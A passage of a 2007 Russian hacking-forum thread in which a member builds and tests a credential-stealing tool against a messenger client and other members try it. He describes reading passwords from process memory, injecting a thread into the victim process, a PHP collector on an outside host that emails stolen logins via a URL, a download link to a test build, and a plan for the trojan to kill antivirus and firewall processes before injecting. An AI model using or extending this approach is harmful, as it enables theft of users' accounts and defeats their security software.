ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 13.01.2007, 19:45
Аватар для darkf0x
darkf0x
Новичок
Регистрация: 12.01.2007
Сообщений: 22
Провел на форуме:
51085

Репутация: 14
По умолчанию

Цитата:
Сообщение от freddi  
darkf0x Маладец!
Все работает, в инет не лезет(те пароли ващи не отправляет никому), пароль от агента нашол, но у меня стояла галочка его сохранить. Довольно быстро, гдето за 1 минуту.


Так что уберите минус у него!!!!
А ладно... Забейте ребята... Каму интересна идея, допишу прогу тому дам заюзать... И Исходники..
По поводу троянских червей: По всей видимостри эвристика работает у этого антивиря сильно но глючно... Имхо проги имеющие в коде функции перебора и открытия левых процессов, а также чтение из них данных считать за трояны... Как-то... Хер знает.. логика понятна, но не всегда правильна!
 
Ответить с цитированием

  #32  
Старый 13.01.2007, 19:48
Аватар для freddi
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

У меня касперский не запалил ничего, и аутпост тоже.
 
Ответить с цитированием

  #33  
Старый 13.01.2007, 19:59
Аватар для darkf0x
darkf0x
Новичок
Регистрация: 12.01.2007
Сообщений: 22
Провел на форуме:
51085

Репутация: 14
По умолчанию

Цитата:
Сообщение от freddi  
У меня касперский не запалил ничего, и аутпост тоже.
на самом деле довольно долго память сканин и проц провешивает... Сейчас решу эту проблему и отвяжу от галки сохранять пароль (вернее от данных из реестра)!
Думаю брутить по другому алгоритму! А то народ не всегда галку ставит...
 
Ответить с цитированием

  #34  
Старый 13.01.2007, 21:22
Аватар для darkf0x
darkf0x
Новичок
Регистрация: 12.01.2007
Сообщений: 22
Провел на форуме:
51085

Репутация: 14
По умолчанию

Сейчас готов скрипт работающий на левом хосте и отправляющий через урл логин и пароль на нужный ящик.. =) Так что скора будет релиз проги и скрипта обслуживающего прогу!
 
Ответить с цитированием

  #35  
Старый 14.01.2007, 10:38
Аватар для Ci5
Ci5
Постоянный
Регистрация: 10.10.2006
Сообщений: 316
Провел на форуме:
1572471

Репутация: 152
Отправить сообщение для Ci5 с помощью ICQ
По умолчанию

Логин и пароль у меня нашел исправно. Кароч, идея хорошая, хоть и узко применимая, но все равно +.
 
Ответить с цитированием

  #36  
Старый 14.01.2007, 11:26
Аватар для darkf0x
darkf0x
Новичок
Регистрация: 12.01.2007
Сообщений: 22
Провел на форуме:
51085

Репутация: 14
По умолчанию

Цитата:
Сообщение от Ci5  
Логин и пароль у меня нашел исправно. Кароч, идея хорошая, хоть и узко применимая, но все равно +.
Согласен... Узкая, но для меня начинающего, надеюсь будет отправной точкой в мир хакерства! =)

Так на сегодняшний день уже:
1. Прога не привязана к реестру (не обязательно ставить галку сохранить пароль)
2. Поиск и парсинг происходит на-а-амного быстрее: (вычисление адреса PE заголовка в памяти + смещение к сегменту данных (размер проги)) Вычисление абсолютного адреса не получилось, имхо файл у них запакован UPX, соответственно PE не совсем тот что нужен мне.. =( Ну и хер с ним.. =) Мы тоже не лыком шиты!
Приблизительный адрес все равно вычисляем! Единственное чтобы вычислить адрес PE хидера, пришлось создавать поток в процессе жертве... Нормальные Антивири на такое могут заорать! =( Но без такого выкрутаса не получить правильного адреса PE хидера MAgenta...
3. Написал скрипт на php, лежит на
darkanclave.hut2.ru - примитив, но исправно должен отправлять пару параметров на указанную почту!
Вызывает так:
darkanclave.hut2.ru/getaccount.php?l=<param1>&p=<param2>&mail=<Ваш почта>
сейчас затачиваю прогу под него! Чтобы скрыто отправляла все что выдрала через этот URL...

Кому интересно новая(скоростная) тестовая версия (без отправки и с выводом лога) лежит: anclave2007.narod.ru/mh.ex
 
Ответить с цитированием

  #37  
Старый 21.01.2007, 17:11
Аватар для Rayne
Rayne
Познающий
Регистрация: 16.01.2007
Сообщений: 42
Провел на форуме:
200028

Репутация: 12
Отправить сообщение для Rayne с помощью ICQ
По умолчанию

Заранее извеняюсь, если что-то не увидел, или просмотрел, но к проге есть мануал, как ею узать?
Заранее спасибо.
ПС автору спасибо за прогу
 
Ответить с цитированием

  #38  
Старый 21.01.2007, 17:26
Аватар для Ci5
Ci5
Постоянный
Регистрация: 10.10.2006
Сообщений: 316
Провел на форуме:
1572471

Репутация: 152
Отправить сообщение для Ci5 с помощью ICQ
По умолчанию

Прога еще в разработке. Жди пока он ее закончит.
 
Ответить с цитированием

  #39  
Старый 21.01.2007, 18:37
Аватар для wano81
wano81
Новичок
Регистрация: 23.10.2006
Сообщений: 24
Провел на форуме:
242723

Репутация: 20
По умолчанию

Цитата:
Сообщение от Rayne  
Заранее извеняюсь, если что-то не увидел, или просмотрел, но к проге есть мануал, как ею узать?
Заранее спасибо.
ПС автору спасибо за прогу

там не нужен мануал просто отправляешь фаил и потом ловишь пасс
но чесно сказать неизвестно выложиться прога в паблик или нет потому как обидели человека очень сильно!
 
Ответить с цитированием

  #40  
Старый 24.01.2007, 12:14
Аватар для darkf0x
darkf0x
Новичок
Регистрация: 12.01.2007
Сообщений: 22
Провел на форуме:
51085

Репутация: 14
По умолчанию

Цитата:
Сообщение от wano81  
там не нужен мануал просто отправляешь фаил и потом ловишь пасс
но чесно сказать неизвестно выложиться прога в паблик или нет потому как обидели человека очень сильно!
Ну... Уж не так сильно, так немножко подобосрали.. =)
Короче народ! Программа почти написана, находится в стадии тестирования и разработки механизма интеграции вредоносного кода в левые процессы... Если не сложно!
Киньте названия процессов всех антивирей и файеров что вам встречались или которые вы юзаете!
Например:
outpost.exe
и т.п.
Это нужно для троя, он будет гасить это дерьмо в памяти
перед своей интеграцией в чужой процесс имхо эти пакостные помошники жизни юзверей перехватывают API вызовы, и блокируют интеграцию.. Чтобы этого не было их нужно замочить... Механизм собственного перехвата API не удобен, имхо после этого трой начинает плохо сосуществовать с антивирями и файерволами! =( Кто юзал к примеру OutpoSt и каспера одновременно на одной тачиле знают, что может быть полная жопа! Поэтому самы простой способ, вырубаем это дерьмо из памяти, интегрируемся, пускай юзер запускает заново... =)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ